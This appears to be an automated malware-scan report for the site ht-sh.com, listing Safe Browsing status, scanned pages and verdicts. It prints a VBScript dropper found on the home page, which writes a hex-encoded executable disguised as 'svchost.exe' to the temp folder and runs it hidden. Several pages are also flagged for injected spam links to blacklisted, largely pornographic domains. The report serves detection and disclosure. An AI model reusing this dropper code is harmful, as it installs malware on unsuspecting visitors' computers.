Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ht-sh.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://ht-sh.com/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 07:08:35 GMT Accept-Ranges: bytes ETag: "4a7d28339c23d01:1657" Server: Microsoft-IIS/6.0 Content-Length: 120413 Content-Location: http://ht-sh.com/index.html Content-Type: text/html Last-Modified: Mon, 29 Dec 2014 19:18:17 GMT | clean |
http://ht-sh.com/index.html | 200 OK Content-Length: 120413 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://ht-sh.com/about/ | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://ht-sh.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://ht-sh.com/html/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 07:08:47 GMT Accept-Ranges: bytes ETag: "de802cd8aa29d01:1657" Server: Microsoft-IIS/6.0 Content-Length: 135256 Content-Location: http://ht-sh.com/html/index.html Content-Type: text/html Last-Modified: Tue, 06 Jan 2015 12:18:14 GMT | clean |
http://ht-sh.com/html/index.html | 200 OK Content-Length: 135256 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: benyi888.com ...[1882 bytes skipped]... ½Õ¯·ãÃâ·ÑС˵Íø</a></li> <li><a href="http://yktcy.com/news/">Ñǫ̂·¢½Í´²Ñø¼¦</a></li> <li><a href="http://tamnls.com/news/">Å·ÃÀÂ×É«ÇéƬ</a></li> <li><a href="http://bc2068.com/news/">ÔÀĸÔÚÎÒ¿çÏ¿ÞÆü</a></li> <li><a href="http://huijiasy.com/trades/">ºìÓ©ÒôÄIJ¿×÷Æ·×îºÃ¿´</a></li> <li><a href="http://benyi888.com/content/">²¨¶àÒ°½áÒÂqvodÔÚÏß</a></li> <li><a href="http://qhjfgl.com/guest/">×ãÃÀÅ®ÊÓƵ</a></li> <li><a href="http://ywkeming.com/news/">Ò»¸ö¿¼ÑÐÅ®ÉúÆÚ¼äµÄÐÔÉú»î×Ô°×txt °Ù¶ÈÍøÅÌ</a></li> <li><a href="http://hbyfzl.com/news/">ËÓлÆÉ«µçÓ°¿ì²¥µÄ</a></li> <li><a ¿Õ½ãÍÑ´©Ë¿Íà</a></dd> <dd><span id="date">2013Äê1ÔÂ5ÈÕ</span> <a href ...[2601 bytes skipped]... | ||
http://baidu.nvdei.com/js/a.js | 200 OK Content-Length: 745 Content-Type: application/x-javascript | clean |
http://ht-sh.com/chanpin/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 07:08:55 GMT Accept-Ranges: bytes ETag: "5a13588c2f2ad01:1657" Server: Microsoft-IIS/6.0 Content-Length: 136136 Content-Location: http://ht-sh.com/chanpin/index.html Content-Type: text/html Last-Modified: Wed, 07 Jan 2015 04:08:10 GMT | clean |
http://ht-sh.com/chanpin/index.html | 200 OK Content-Length: 136136 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: dj-kk.com ...[1145 bytes skipped]... tact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://xintuolicai.com/news/">²ñD¤æ¤¥¤ê ѸÀ×</a></li> <li><a href="http://dj-kk.com/gbuks/">ç÷Ôµ±¨ÂëÁÄÌìÊÒ</a></li> <li><a href="http://tjkjhk.com/news/">wwwe.91vs.com</a></li> <li><a href="http://s-wolf.com/items/">btÑÇÖÞÇø</a></li> <li><a href="http://cjgszk.com/customer/">²Ô¾®¿Õ×÷Æ·°Ù¶ÈÌù°É</a></li> <li><a href="http://hrjs77.com/guest/">°ÇÃÀŮҷþСÓÎÏ·</a></li> <li><a href="http://fsdrt.com/items/">ÐÇҰɳ¹û{¤µ¤ó qv ...[3342 bytes skipped]... | ||
http://ht-sh.com/news_cn/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 07:09:02 GMT Accept-Ranges: bytes ETag: "c8e08d72b42ad01:1657" Server: Microsoft-IIS/6.0 Content-Length: 135228 Content-Location: http://ht-sh.com/news_cn/index.html Content-Type: text/html Last-Modified: Wed, 07 Jan 2015 19:59:29 GMT X-Died: timeout at scan.pm line 1566. | clean |
http://ht-sh.com/news_cn/index.html | 200 OK Content-Length: 135228 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: itjh.net ...[1054 bytes skipped]... n/">²úÆ·ÐÅÏ¢</a> > <a href="/news_cn/">ÈȵãÐÂÎÅ</a> ><a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://itjh.net/news/">www.sa.com</a></li> <li><a href="http://hfktqx.com/project/">¶ù×Óµ²²»×¡ÂèÂèµÄ·áÈéÓÕ»ó</a></li> <li><a href="http://kfaoyi.com/news/">Ç°Ì狼¤©¤ê8ʱ¼ä¿ì²¥</a></li> <li><a href="http://shidafuwu.com/gbuks/">qiangjian-av</a></li> <li><a href="http://hrbwolf.com/news/">Ä£ÌØÓÅè¯ÈËÌåÒÕÊõ</a></li> <li><a href="http://jiabao888.com/news/">ÄÐ ...[3410 bytes skipped]... | ||
http://ht-sh.com/contact/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 07:09:07 GMT Accept-Ranges: bytes ETag: "92935954392bd01:1657" Server: Microsoft-IIS/6.0 Content-Length: 135369 Content-Location: http://ht-sh.com/contact/index.html Content-Type: text/html Last-Modified: Thu, 08 Jan 2015 11:50:42 GMT | clean |
http://ht-sh.com/contact/index.html | 200 OK Content-Length: 135369 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: kw123.net ...[1706 bytes skipped]... /">91pornÍøÖ··¢²¼Ò³</a></li> <li><a href="http://y10574.com/news/">ËÄ·¿²¥²¥ÎåÔÂÌì¿ì²¥</a></li> <li><a href="http://cqyb888.com/content/">kk44kk.cn</a></li> <li><a href="http://liuliu666.com/project/">ÈËÌåÒÕÊõÄ£ÌØÏãÏã</a></li> <li><a href="http://slbbw.cn/html/">ĸ×Ó×ö°®</a></li> <li><a href="http://kw123.net/project/">³ÕººµØÓü ¿ì²¥</a></li> <li><a href="http://pruskey.com/contact/">ÃÀÅ®×ÔÅÄ¿Û±ÆͼƬ</a></li> <li><a href="http://lsqz0538.com/news/">xxx6789ÐÂÍøÖ·</a></li> <li><a href="http://hbosta.org/news/">91porn³¬Åö</a></li> <li><a href="http://aizhis.com/project/">±±ÌõÂéåú°Ù¶ÈÌù°É</a></li> <li><a href="http://rpjzez.com.cn/service/">³õÒô·âà ...[2778 bytes skipped]... | ||
http://ht-sh.com/guest/ | HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 07:09:10 GMT Accept-Ranges: bytes ETag: "9a575d4abe2bd01:1657" Server: Microsoft-IIS/6.0 Content-Length: 135631 Content-Location: http://ht-sh.com/guest/index.html Content-Type: text/html Last-Modified: Fri, 09 Jan 2015 03:42:28 GMT | clean |
http://ht-sh.com/guest/index.html | 200 OK Content-Length: 135631 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: dgsjlm.com ...[1052 bytes skipped]... /">²úÆ·ÐÅÏ¢</a> > <a href="/news_cn/">ÈȵãÐÂÎÅ</a> ><a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://dgsjlm.com/chanpin/">ÃÀÉÙÅ®ËÀ¼é</a></li> <li><a href="http://xsydesign.com/customer/">Å®ÐԸ߳±ÉùÒômp3</a></li> <li><a href="http://bjdfjt.com/items/">www.53gan.com</a></li> <li><a href="http://gslsyl.com/items/">¹ãÖÝÉ£ÄÃÂÛ̳</a></li> <li><a href="http://jxlzjx.com/items/">maxi 247 ÌÙÔÁÉ×Ó</a></li> <li><a href="http://suwen0512.com/news/">É«±ÈµçÓ°&l ...[3406 bytes skipped]... | ||
http://ht-sh.com/guest/0.html | 200 OK Content-Length: 15932 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: jngsgw.com ...[1116 bytes skipped]... ">²úÆ·ÐÅÏ¢</a> > <a href="/news_cn/">ÈȵãÐÂÎÅ</a> ><a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a></div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÈÈÃÅÎÄÕÂ</h2> <ul><li><a href="http://jngsgw.com/news/">Àϸ¾ÈËÂãÌå</a></li> <li><a href="http://smrtsy.com/customer/">qqÓÄĬ¶Ô»°</a></li> <li><a href="http://kzyykd.com/trades/">ÄÄÀïÓÐëƬÍøÖ·</a></li> <li><a href="http://wapmdbzd.com/service/">ÈÕº«ÃÀŮ˽´¦</a></li> <li><a href="http://cqwsgl.com/items/">°Ä·ѩ</a></li> <li><a href="http://jesonmkt.com/service/">ÃÀÅ®±»²ÙµÄ¹ÊÊÂ</a> ...[3352 bytes skipped]... | ||
http://ht-sh.com/guest/1.html | 200 OK Content-Length: 16438 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: suwen0512.com ...[1512 bytes skipped]... <ul><li><a href="http://xiande56.com/news_cn/">ʱ¼äֹͣȫ¼¯qvod</a></li> <li><a href="http://quicksave.cn/news/">ÔóåêÓ¢Áú»ªÐԸбÚÖ½</a></li> <li><a href="http://pos881.com/news_cn/">·òÆ޳ɳ¤ÈռǶ¯»ÏÂÔØ</a></li> <li><a href="http://bthuaqianghbsb.com/mtope/">Î÷Å·´óµ¨ÈËÌåÒÕÊõ</a></li> <li><a href="http://suwen0512.com/service/">www.98uaa.com</a></li> <li><a href="http://egame69.com/news/">¿ì²¥5µçÓ°É«ÍøÕ¾</a></li> <li><a href="http://xmfshs.com/news/">ͼƬÃÀÅ®ÍѹâµÄ¶´Ñ¨</a></li> <li><a href="http://yshxt.cn/news_cn/">Å©·òµ¼º½ÓÀ¾Ã</a></li> <li><a href="http://tkgouw.com/companys/">ÒÕÊõÂãÌåÃÀÅ®</a></li> <li><a href="http://fuliangma.com/news/">¸Ð¹¬Íõ¹ú ...[2909 bytes skipped]... | ||
http://ht-sh.com/guest/2.html | 200 OK Content-Length: 16810 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: gxsuncom.com ...[1410 bytes skipped]... t;div id="side"> <div class="sideNav"> <h2>ÈÈÃÅÎÄÕÂ</h2> <ul><li><a href="http://pvckaa.com/news/">¿´³ÉÈËÈ«ÂãµçÓ°</a></li> <li><a href="http://benchgrinder.com.cn/about/">wwww.laolaofa.com</a></li> <li><a href="http://kmsusn.com/news/">Å·ÃÀÄÐÄ£Ó¾×°¼¡Í¹</a></li> <li><a href="http://gxsuncom.com/news/">chengrenshequ</a></li> <li><a href="http://lsqz0538.com/chanpin/">ÓÅÓÅÈÃÈËÌåÒÕÊõ</a></li> <li><a href="http://richna.com/news/">¿ì²¥ ÐÔ</a></li> <li><a href="http://male100.com/html/">ÎÒÏë¿´»ÆÉ«</a></li> <li><a href="http://kw123.net/mtope/">·ò¸¾ÀÖÔ°ÔĶÁ</a></li> <li><a href="http://huiwu365.com/content/">ËÉÒ°Óɾ®torrentºÏ¼¯</a ...[2877 bytes skipped]... | ||
http://ht-sh.com/guest/3.html | 200 OK Content-Length: 16440 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: fhcgw.com ...[1295 bytes skipped]... <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÈÈÃÅÎÄÕÂ</h2> <ul><li><a href="http://nxhyl.com/gbuks/">Å·ÃÀÅ®ÈËÉúÖ³Æ÷ͼƬ</a></li> <li><a href="http://gaokao3x.com/chanpin/">ÎäÆ÷½éÉÜ</a></li> <li><a href="http://fhcgw.com/about/">bl¸ßh¶¯»</a></li> <li><a href="http://bwkjwl.com/contact/">³ÉÈ˵çÓ°´óºèÃ×µê</a></li> <li><a href="http://sqsczs.com/contact/">ºê»ùÖйú¹ÙÍø</a></li> <li><a href="http://zgwjdl.com/trades/">ÒùÈËʦ±íÏÂÔØ</a></li> <li><a href="http://xinlimc.com.cn/project/">βҰÕæÖª×ÓµÚÒ»²¿×÷Æ·</a></li> <li><a href="http://wzhxyp.com/service/">½á³Ç¥ ...[3104 bytes skipped]... | ||
http://ht-sh.com/guest/4.html | 200 OK Content-Length: 16769 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: gsxysm.com ...[1285 bytes skipped]... gt; <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÈÈÃÅÎÄÕÂ</h2> <ul><li><a href="http://wxtgw.com/news/">СÎ÷¤Þ¤ê¤§¤È</a></li> <li><a href="http://xahkjc.com/items/">rÈËÌåÐÔÒÕÊõͼƬ</a></li> <li><a href="http://gsxysm.com/items/">βÉÏÈôÒ¶ed2k</a></li> <li><a href="http://hbosta.org/news/">һ·ÏòÎ÷¸ßÇåÍêÕû°æÖÖ×Ó</a></li> <li><a href="http://ez0711.com/news_cn/">ÄÐÈ˵ÄÈËÌåÒÕÊõдÕæ</a></li> <li><a href="http://lybcfs.com/customer/">°Ö°Ö²ÙÃÃÃûÆɫС˵</a></li> <li><a href="http://cnjcmx.com/news/">¶þÄêh°à</a></li> <li><a href="http://bbsai.cn/gbuks/">ÎҺͽã½ãà ...[3012 bytes skipped]... | ||
http://ht-sh.com/guest/5.html | 200 OK Content-Length: 16838 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hbhszj.com ...[1200 bytes skipped]... contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a></div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÈÈÃÅÎÄÕÂ</h2> <ul><li><a href="http://cbfedu.com/news/">Ç¿¼éÒùµ´ÉÙ¸¾Ð¡Ëµ</a></li> <li><a href="http://hbhszj.com/customer/">qq·É³µ¸ãЦ¿ì½ÝÁÄÌì</a></li> <li><a href="http://benyi888.com/contact/">ÕÅÀòǹ¾öÈ«¹ý³Ì</a></li> <li><a href="http://jggrp.com/trades/">Å·ÃÀÈËÌåÒÕÊõŮģÌØ</a></li> <li><a href="http://fanyihai.net/news/">¹úÄÚÈËÌåÒÕÊõÃÀÅ®ÈËÌåÒÕÊõ</a></li> <li><a href="http://dg-e.com/gbuks/">ÅËÑôºÏ³Éͼ</a></li> <li><a href="http://whfxz.cn/news/"> ...[3084 bytes skipped]... | ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ht-sh.com
Result:
HTTP/1.1 200 OK
Date: Tue, 13 Jan 2015 07:08:35 GMT
Accept-Ranges: bytes
ETag: "4a7d28339c23d01:1657"
Server: Microsoft-IIS/6.0
Content-Length: 120413
Content-Location: http://ht-sh.com/index.html
Content-Type: text/html
Last-Modified: Mon, 29 Dec 2014 19:18:17 GMT
...120413 bytes of data.
GET / HTTP/1.1
Host: ht-sh.com
Result:
HTTP/1.1 200 OK
Date: Tue, 13 Jan 2015 07:08:35 GMT
Accept-Ranges: bytes
ETag: "4a7d28339c23d01:1657"
Server: Microsoft-IIS/6.0
Content-Length: 120413
Content-Location: http://ht-sh.com/index.html
Content-Type: text/html
Last-Modified: Mon, 29 Dec 2014 19:18:17 GMT
...120413 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ht-sh.com
Referer: http://www.google.com/search?q=ht-sh.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ht-sh.com
Referer: http://www.google.com/search?q=ht-sh.com
Result:
The result is similar to the first query. There are no suspicious redirects found.